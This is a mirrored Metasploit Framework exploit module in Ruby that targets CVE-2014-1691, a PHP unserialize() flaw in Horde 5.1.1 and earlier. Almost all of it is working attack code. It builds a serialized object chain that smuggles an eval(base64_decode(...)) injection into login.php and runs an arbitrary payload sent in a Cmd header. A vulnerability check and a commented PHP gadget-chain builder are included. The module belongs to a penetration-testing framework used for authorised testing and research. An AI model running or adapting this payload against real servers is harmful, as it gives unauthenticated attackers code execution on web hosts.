CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/horde_unserialize_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Horde Framework Unserialize PHP Code Execution',

14
      'Description'    => %q{

15
        This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be

16
        abused to allow unauthenticated users to execute arbitrary code with the permissions of

17
        the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.

18
        The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean

19
        class to reach a dangerous call_user_func() call in the Horde_Prefs class.

20
      },

21
      'Author'         =>

22
        [

23
          'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)

24
          'juan vazquez' # Metasploit module

25
        ],

26
      'License'        => MSF_LICENSE,

27
      'References'     =>

28
        [

29
          [ 'CVE', '2014-1691' ],

30
          [ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],

31
          [ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],

32
          [ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]

33
        ],

34
      'Privileged'     => false,

35
      'Platform'       => ['php'],

36
      'Arch'           => ARCH_PHP,

37
      'Payload'        =>

38
        {

39
          'DisableNops' => true

40
        },

41
      'Targets'        => [ ['Horde 5', { }], ],

42
      'DefaultTarget'  => 0,

43
      'DisclosureDate' => '2013-06-27'

44
      ))

45


46
      register_options(

47
        [

48
          OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])

49
        ])

50
  end

51


52
  def check

53
    flag = rand_text_alpha(rand(10)+20)

54
    res = send_request_exploit("print #{flag};die;")

55
    if res and res.body and res.body.to_s =~ /#{flag}/

56
      return Exploit::CheckCode::Vulnerable

57
    end

58
    return Exploit::CheckCode::Safe

59
  end

60


61
  def exploit

62
    print_status("Testing injection...")

63
    unless check == Exploit::CheckCode::Vulnerable

64
      fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")

65
    end

66


67
    print_status("Exploiting the unserialize()...")

68
    send_request_exploit(payload.encoded)

69
  end

70


71
  def send_request_exploit(p)

72
    php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"

73


74
    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"

75
    payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"

76
    payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"

77
    payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"

78
    payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"

79


80
    send_request_cgi(

81
      {

82
        'uri'       => normalize_uri(target_uri.path.to_s, "login.php"),

83
        'method'    => 'POST',

84
        'vars_post' => {

85
          '_formvars' => payload_serialized

86
        },

87
        'headers' => {

88
          'Cmd' => Rex::Text.encode_base64(p)

89
        }

90
      })

91
  end

92
end

93


94
=begin

95


96
PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection

97


98
class Horde_Config

99
{

100
   protected $_oldConfig = "phpinfo();die;";

101
}

102


103
class Horde_Prefs_Scope

104
{

105
   protected $_prefs = array(1);

106
}

107


108
class Horde_Prefs

109
{

110
   protected $_opts, $_scopes;

111


112
   function __construct()

113
   {

114
      $this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');

115
      $this->_scopes['horde'] = new Horde_Prefs_Scope;

116
   }

117
}

118


119
class Horde_Prefs_Identity

120
{

121
   protected $_prefs, $_prefnames;

122


123
   function __construct()

124
   {

125
      $this->_prefs = new Horde_Prefs;

126
      $this->_prefnames['identities'] = 0;

127
   }

128
}

129


130
class Horde_Kolab_Server_Decorator_Clean

131
{

132
   private $_server, $_added = array(1);

133


134
   function __construct()

135
   {

136
      $this->_server = new Horde_Prefs_Identity;

137
   }

138
}

139


140
$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);

141


142
=end

143


144